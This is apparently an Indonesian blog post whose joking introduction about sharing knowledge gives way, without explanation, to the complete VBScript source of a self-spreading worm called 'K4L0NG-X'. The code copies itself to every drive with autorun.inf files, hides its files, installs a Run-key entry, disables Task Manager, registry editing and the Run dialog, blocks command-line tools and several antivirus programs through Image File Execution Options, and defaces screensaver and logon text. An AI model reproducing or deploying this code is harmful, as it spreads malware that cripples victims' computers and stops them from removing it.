Saya ingin berbagi pengetahuan dengan kalian, tapi Saya mau cerita dulu ya sebelum masuk ke inti pembicaraan. Itung-itung curhat, Hehehe....
Pada zaman dahulu, hidup lah seorang Hacker...., Eeeeeh keliru!!! Ko' bisa nyasar ke Hacker ya.....??
on error resume next
dim rute,windows,sadis,an,dree,isi,ony,k4l0ng_X,nitro,check,sido
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0ng-X.dll.vbs"
set an = createobject("Scripting.FileSystemObject")
set dree = an.getfile(Wscript.ScriptFullname)
dim text,size
size = dree.size
check = dree.drive.drivetype
set text = dree.openastextstream(1,-2)
do while not text.atendofstream
rute = rute & text.readline
rute = rute & vbcrlf
loop
do
Set windows = an.getspecialfolder(0)
Set windows = an.getspecialfolder(1)
set ony = an.getfile(windows & "\k4l0ng-X.dll.vbs")
ony.attributes = 39
set ony = an.createtextfile(windows & "\k4l0ng-X.dll.vbs",2,true)
ony.write rute
ony.close
set ony = an.getfile(windows & "\k4l0ng-X.dll.vbs")
ony.attributes = 39
for each sadis in an.drives
If (sadis.drivetype = 1 or sadis.drivetype = 2) and sadis.path <> "A:" then
set ony=an.getfile(sadis.path &"\k4l0ng-X32.dll.vbs")
ony.attributes =39
set ony=an.createtextfile(sadis.path &"\k4l0ng-X32.dll.vbs",2,true)
ony.write rute
ony.close
set ony=an.getfile(sadis.path &"\k4l0ng-Xt32.dll.vbs")
ony.attributes = 39
set ony =an.getfile(sadis.path &"\autorun.inf")
ony.attributes = 39
set ony=an.createtextfile(sadis.path &"\autorun.inf",2,true)
ony.write isi
ony.close
set ony = an.getfile(sadis.path &"\autorun.inf")
ony.attributes=39
end if
next
set k4l0ng_X = createobject("WScript.Shell")
set k4l0ng_X = createobject("WScript.Shell")
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE","%SystemRoot%\system32\sstext3d.scr"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut","60"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Themes\LastTheme\ThemeFile","%SystemRoot%\resources\Themes\Windows Classic.theme"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Themes\LastTheme\Wallpaper","%SystemRoot%\Web\Wallpaper\Radiance.jpg"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: - K4L0NG-X_Menyerang!!! - ::"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\DisplayString","- K4L0NG-X VIRUZ -"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\FontFace","Colonna MT"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\RotationStyle",3, "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- k4l0ng-X.dll.vbs"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", ".:K4l0ng-X:."
k4l0ng_X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText","Komputermu terkena Virus K4L0NG-X!!!"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANSAV.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32-RTP.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger","notepad.exe"
if check <> 1 then
Wscript.sleep 100000
end if
do
loop while check <> 1
set sido = createobject("Wscript.shell")
sido.run windows & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
loop